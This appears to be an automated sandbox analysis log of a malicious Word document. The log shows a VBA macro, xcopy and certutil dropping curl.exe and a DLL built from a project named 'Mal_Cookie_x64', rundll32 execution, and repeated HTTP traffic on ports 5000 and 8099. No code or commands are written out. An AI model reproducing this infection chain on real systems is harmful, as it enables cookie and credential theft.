Source: ~WRC0000.tmp.26.dr Initial sample: OLE zip file path = docProps/custom.xml
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
Source: Binary string: curl.pdb source: xcopy.exe, 0000000A.00000002.2145898386.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2148940386.0000000002928000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000C.00000002.2154163486.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 0000000D.00000000.2155057954.00000000008B5000.00000002.00000001.01000000.00000007.sdmp, xcopy.exe, 0000001E.00000002.2727525467.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2729026809.0000000004760000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2728920488.0000000002A08000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000020.00000002.2732646936.0000000002D98000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: D:\c++\Mal_Cookie_x64\x64\Release\mscorsvc.pdb source: certutil.exe, 0000000E.00000003.2191196676.0000000004907000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp
Source: Element design set.dotx.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Source: VBA code instrumentation OLE, VBA macro, High number of string operations: Module ThisDocument Name: ThisDocument
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 13_2_0087D33A GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,malloc,GetSystemDirectoryA,LoadLibraryA,free,free, 13_2_0087D33A
Source: mscorsvc.dll.14.dr Static PE information: section name: _RDATA
Source: C:\Windows\System32\rundll32.exe Code function: 16_2_00007FFD92C4A381 push rdx; ret 16_2_00007FFD92C4A38B
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\SysWOW64\certutil.exe File created: C:\Users\user\AppData\Local\Temp\mscorsvc.dll

Hooking and other Techniques for Hiding and Protection

Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 8099
Source: unknown Network traffic detected: HTTP traffic on port 8099 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 8099 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 49802 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49802
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49803
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 49809 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49809
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49810
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49811
Source: unknown Network traffic detected: HTTP traffic on port 49812 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49812
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49813
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 49195 -> 8099
Source: unknown Network traffic detected: HTTP traffic on port 8099 -> 49195
Source: unknown Network traffic detected: HTTP traffic on port 49209 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49209
Source: unknown Network traffic detected: HTTP traffic on port 49210 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49210
Source: unknown Network traffic detected: HTTP traffic on port 49211 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49211
Source: unknown Network traffic detected: HTTP traffic on port 49212 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49212
Source: unknown Network traffic detected: HTTP traffic on port 49214 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49214
Source: unknown Network traffic detected: HTTP traffic on port 49215 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49215
Source: unknown Network traffic detected: HTTP traffic on port 49216 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49216
Source: unknown Network traffic detected: HTTP traffic on port 49218 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49218
Source: unknown Network traffic detected: HTTP traffic on port 49219 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49219
Source: unknown Network traffic detected: HTTP traffic on port 49220 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49220
Source: unknown Network traffic detected: HTTP traffic on port 49221 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49221
Source: unknown Network traffic detected: HTTP traffic on port 49222 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49222
Source: unknown Network traffic detected: HTTP traffic on port 49223 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49223
Source: unknown Network traffic detected: HTTP traffic on port 49224 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49224
Source: unknown Network traffic detected: HTTP traffic on port 49225 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49225
Source: unknown Network traffic detected: HTTP traffic on port 49226 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49226
Source: unknown Network traffic detected: HTTP traffic on port 49227 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49227
Source: unknown Network traffic detected: HTTP traffic on port 49228 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49228
Source: unknown Network traffic detected: HTTP traffic on port 49229 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49229
Source: unknown Network traffic detected: HTTP traffic on port 49230 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49230
Source: unknown Network traffic detected: HTTP traffic on port 49231 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49231
Source: unknown Network traffic detected: HTTP traffic on port 49232 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49232
Source: unknown Network traffic detected: HTTP traffic on port 49234 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49234
Source: unknown Network traffic detected: HTTP traffic on port 49235 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49235
Source: unknown Network traffic detected: HTTP traffic on port 49236 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49236
Source: unknown Network traffic detected: HTTP traffic on port 49237 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49237
Source: unknown Network traffic detected: HTTP traffic on port 49238 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49238
Source: unknown Network traffic detected: HTTP traffic on port 49239 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49239
Source: unknown Network traffic detected: HTTP traffic on port 49240 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49240
Source: unknown Network traffic detected: HTTP traffic on port 49241 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49241
Source: unknown Network traffic detected: HTTP traffic on port 49242 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49242
Source: unknown Network traffic detected: HTTP traffic on port 49243 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49243
Source: unknown Network traffic detected: HTTP traffic on port 49244 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49244
Source: unknown Network traffic detected: HTTP traffic on port 49245 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49245
Source: unknown Network traffic detected: HTTP traffic on port 49246 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49246
Source: unknown Network traffic detected: HTTP traffic on port 49247 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49247
Source: unknown Network traffic detected: HTTP traffic on port 49248 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49248
Source: unknown Network traffic detected: HTTP traffic on port 49249 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49249
Source: unknown Network traffic detected: HTTP traffic on port 49250 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49250
Source: unknown Network traffic detected: HTTP traffic on port 49251 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49251
Source: unknown Network traffic detected: HTTP traffic on port 49252 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49252
Source: unknown Network traffic detected: HTTP traffic on port 49253 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49253
Source: unknown Network traffic detected: HTTP traffic on port 49254 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49254
Source: unknown Network traffic detected: HTTP traffic on port 49255 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49255
Source: unknown Network traffic detected: HTTP traffic on port 49256 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49256
Source: unknown Network traffic detected: HTTP traffic on port 49257 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49257
Source: unknown Network traffic detected: HTTP traffic on port 49258 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49258
Source: unknown Network traffic detected: HTTP traffic on port 49259 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49259
Source: unknown Network traffic detected: HTTP traffic on port 49260 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49260
Source: unknown Network traffic detected: HTTP traffic on port 49261 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49261
Source: unknown Network traffic detected: HTTP traffic on port 49262 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49262
Source: unknown Network traffic detected: HTTP traffic on port 49263 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49263
Source: unknown Network traffic detected: HTTP traffic on port 49264 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49264
Source: unknown Network traffic detected: HTTP traffic on port 49265 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49265
Source: unknown Network traffic detected: HTTP traffic on port 49266 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49266
Source: unknown Network traffic detected: HTTP traffic on port 49267 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49267
Source: unknown Network traffic detected: HTTP traffic on port 49269 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49269
Source: unknown Network traffic detected: HTTP traffic on port 49270 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49270
Source: unknown Network traffic detected: HTTP traffic on port 49271 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49271
Source: unknown Network traffic detected: HTTP traffic on port 49272 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49272
Source: unknown Network traffic detected: HTTP traffic on port 49273 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49273
Source: unknown Network traffic detected: HTTP traffic on port 49274 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49274
Source: unknown Network traffic detected: HTTP traffic on port 49275 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49275
Source: unknown Network traffic detected: HTTP traffic on port 49276 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49276
Source: unknown Network traffic detected: HTTP traffic on port 49277 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49277
Source: unknown Network traffic detected: HTTP traffic on port 49278 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49278
Source: unknown Network traffic detected: HTTP traffic on port 49279 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49279
Source: unknown Network traffic detected: HTTP traffic on port 49280 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49280
Source: unknown Network traffic detected: HTTP traffic on port 49281 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49281
Source: unknown Network traffic detected: HTTP traffic on port 49282 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49282
Source: unknown Network traffic detected: HTTP traffic on port 49283 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49283
Source: unknown Network traffic detected: HTTP traffic on port 49284 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49284
Source: unknown Network traffic detected: HTTP traffic on port 49285 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49285
Source: unknown Network traffic detected: HTTP traffic on port 49286 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49286
Source: unknown Network traffic detected: HTTP traffic on port 49287 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49287
Source: unknown Network traffic detected: HTTP traffic on port 49288 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49288
Source: unknown Network traffic detected: HTTP traffic on port 49289 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49289
Source: unknown Network traffic detected: HTTP traffic on port 49290 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49290
Source: unknown Network traffic detected: HTTP traffic on port 49291 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49291
Source: unknown Network traffic detected: HTTP traffic on port 49292 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49292
Source: unknown Network traffic detected: HTTP traffic on port 49293 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49293
Source: unknown Network traffic detected: HTTP traffic on port 49294 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49294
Source: unknown Network traffic detected: HTTP traffic on port 49295 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49295
Source: unknown Network traffic detected: HTTP traffic on port 49296 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49296
Source: unknown Network traffic detected: HTTP traffic on port 49297 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49297
Source: unknown Network traffic detected: HTTP traffic on port 49298 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49298
Source: unknown Network traffic detected: HTTP traffic on port 49299 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49299
Source: unknown Network traffic detected: HTTP traffic on port 49300 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49300
Source: unknown Network traffic detected: HTTP traffic on port 49301 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49301
Source: unknown Network traffic detected: HTTP traffic on port 49302 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49302
Source: unknown Network traffic detected: HTTP traffic on port 49303 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49303
Source: unknown Network traffic detected: HTTP traffic on port 49304 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49304
Source: unknown Network traffic detected: HTTP traffic on port 49305 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49305
Source: unknown Network traffic detected: HTTP traffic on port 49306 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49306
Source: unknown Network traffic detected: HTTP traffic on port 49307 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49307
Source: unknown Network traffic detected: HTTP traffic on port 49308 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49308
Source: unknown Network traffic detected: HTTP traffic on port 49309 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49309
Source: unknown Network traffic detected: HTTP traffic on port 49310 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49310
Source: unknown Network traffic detected: HTTP traffic on port 49311 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49311
Source: unknown Network traffic detected: HTTP traffic on port 49312 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49312
Source: unknown Network traffic detected: HTTP traffic on port 49313 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49313
Source: unknown Network traffic detected: HTTP traffic on port 49314 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49314
Source: unknown Network traffic detected: HTTP traffic on port 49315 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49315
Source: unknown Network traffic detected: HTTP traffic on port 49316 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49316
Source: unknown Network traffic detected: HTTP traffic on port 49317 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49317
Source: unknown Network traffic detected: HTTP traffic on port 49318 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49318
Source: unknown Network traffic detected: HTTP traffic on port 49319 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49319
Source: unknown Network traffic detected: HTTP traffic on port 49320 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49320
Source: unknown Network traffic detected: HTTP traffic on port 49321 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49321
Source: unknown Network traffic detected: HTTP traffic on port 49322 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49322
Source: unknown Network traffic detected: HTTP traffic on port 49323 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49323
Source: unknown Network traffic detected: HTTP traffic on port 49324 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49324
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 49327 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49327
Source: unknown Network traffic detected: HTTP traffic on port 49328 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49328
Source: unknown Network traffic detected: HTTP traffic on port 49329 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49329
Source: unknown Network traffic detected: HTTP traffic on port 49330 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49330
Source: unknown Network traffic detected: HTTP traffic on port 49331 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49331
Source: unknown Network traffic detected: HTTP traffic on port 49332 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49332
Source: unknown Network traffic detected: HTTP traffic on port 49333 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49333
Source: unknown Network traffic detected: HTTP traffic on port 49334 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49334
Source: unknown Network traffic detected: HTTP traffic on port 49335 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49335
Source: unknown Network traffic detected: HTTP traffic on port 49336 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49336
Source: unknown Network traffic detected: HTTP traffic on port 49337 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49337
Source: unknown Network traffic detected: HTTP traffic on port 49338 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49338
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
